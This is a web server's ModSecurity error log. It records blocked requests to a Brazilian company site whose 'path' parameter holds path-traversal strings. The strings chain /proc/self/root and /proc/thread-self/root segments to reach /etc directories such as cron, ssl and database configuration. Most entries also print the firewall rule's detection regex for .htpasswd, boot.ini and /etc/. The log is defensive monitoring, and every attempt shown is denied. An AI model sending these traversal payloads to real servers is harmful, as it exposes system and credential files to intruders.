[Wed Mar 18 07:12:00.234863 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:35236] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp6cOoXxyEfFpUF8f9FUAAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:12:01.552135 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:35252] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp6cda6ubjKNq_cu4Zu1gAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:12:31.944192 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:35264] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp6j-oXxyEfFpUF8f9FdAAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:12:38.389466 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.228.61:34792] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abp6lsdf6f5d65gmYZSqpgAAAsI"]
[Wed Mar 18 07:12:38.902399 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.241.31:59312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp6lkzinOy1jxa1j4fqzwAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:12:42.960799 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.241.31:54176] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp6msdf6f5d65gmYZSqqgAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:12:43.879628 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.244.43:41392] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abp6m-yqAr6etmhZHNqTzwAAAEo"]
[Wed Mar 18 07:13:33.902376 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.241.31:54188] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp6zcdf6f5d65gmYZSq_QAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:13:46.186090 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.241.31:52328] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp62tY0UrI5A3LftIxyuwAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:14:05.915023 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.241.31:57126] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp67UzinOy1jxa1j4fq8AAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:15:23.831159 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.241.31:52100] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp7O9Y0UrI5A3LftIxzAQAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:15:47.731104 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.241.31:52890] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp7UwkwaGbbGflqUZDphAAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:16:33.463992 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.241.31:43248] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp7gEzinOy1jxa1j4frOgAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:17:24.471261 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.241.31:55536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp7tNY0UrI5A3LftIxzUgAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:17:25.799000 2026] [:error] [pid 15051:tid 140411666392832] [client 74.7.241.31:36720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp7tSmAPhZkrhU8w4lGcgAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:17:38.602381 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.228.61:46662] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abp7wimAPhZkrhU8w4lGfwAAAIg"]
[Wed Mar 18 07:17:44.822378 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.244.43:34564] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abp7yAkwaGbbGflqUZDpzwAAANU"]
[Wed Mar 18 07:19:44.215088 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:36606] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp8P_u8EFLIOrSqIpveXwAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:19:46.486972 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:46466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp8Qsdf6f5d65gmYZSsXAAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:19:57.771235 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.241.31:45950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp8TdY0UrI5A3LftIxz5QAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:20:40.909207 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.241.31:52434] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp8eEzinOy1jxa1j4fr3AAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:20:44.705158 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.241.31:44968] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp8fOyqAr6etmhZHNqVRAAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:21:09.079972 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:46480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp8leyqAr6etmhZHNqVcAAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:21:58.067504 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:41842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp8xgkwaGbbGflqUZDq6wAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:22:06.975213 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:34216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] 